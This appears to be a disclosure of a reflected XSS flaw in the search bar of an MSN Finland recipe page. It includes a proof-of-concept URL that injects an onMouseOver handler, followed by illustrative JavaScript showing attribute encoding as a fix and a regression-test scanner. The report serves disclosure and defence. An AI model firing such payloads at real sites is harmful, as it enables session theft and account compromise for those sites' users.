Overview
The search bar on this page fails to encode double quotes ("). As a result, an onMouseOver event handler attribute can be attached to the search bar, which allows an XSS attack to occur.
Code:
http://ideakeittio.fi.msn.com/ruokaohjehaku/
?q=" onMouseOver=alert(/XSS/) "
&mealtypes=suolaiset
&mealtypes=leivonta-2
&main_ingredient=1
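
The missing encoding and its fix, shown side by side as an added example (not code from the affected site). The input markup, the function names and the small attribute scanner are assumptions made for illustration; the q value is the one from the URL above, URL-decoded.

```javascript
// Added example: the markup below is an assumed shape for the search field,
// not the site's real template.

// Vulnerable form: the q parameter is copied into the value attribute as-is.
function renderSearchUnsafe(q) {
  return `<input type="text" name="q" value="${q}">`;
}

// Encode the characters that can end an attribute value or start markup.
function encodeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened form: same markup, but the value is attribute-encoded.
function renderSearchSafe(q) {
  return `<input type="text" name="q" value="${encodeAttr(q)}">`;
}

// Minimal attribute scanner for a single tag: returns the attribute names
// an HTML parser would see, so a regression test can assert that the
// reflected value did not create an extra attribute.
function attributeNames(tag) {
  const names = [];
  const body = tag.replace(/^<\w+/, '').replace(/\/?>$/, '');
  const re = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  let m;
  while ((m = re.exec(body)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// The q value from the report's URL, after URL decoding.
const reportedQ = '" onMouseOver=alert(/XSS/) "';

// Unencoded: the quote closes value="" and onmouseover becomes an attribute.
console.log(attributeNames(renderSearchUnsafe(reportedQ)));
// Encoded: the whole string stays inside value; only the template's attributes remain.
console.log(attributeNames(renderSearchSafe(reportedQ)));
```

The same attribute-name assertion can be used as a regression test for any template that reflects a request parameter into a quoted attribute.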